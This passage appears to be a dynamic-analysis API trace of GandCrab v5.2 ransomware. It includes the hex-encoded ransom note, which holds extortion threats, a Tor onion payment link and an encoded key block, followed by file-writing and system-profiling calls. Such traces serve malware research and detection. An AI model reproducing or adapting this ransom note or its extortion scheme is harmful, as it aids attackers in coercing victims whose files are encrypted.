(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.350] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0080.351] CloseHandle (hObject=0x2d4) returned 1 [0080.351] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.351] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.351] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x29f)) [0080.352] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.352] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.352] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.352] wsprintfW (in: param_1=0x25d0000, 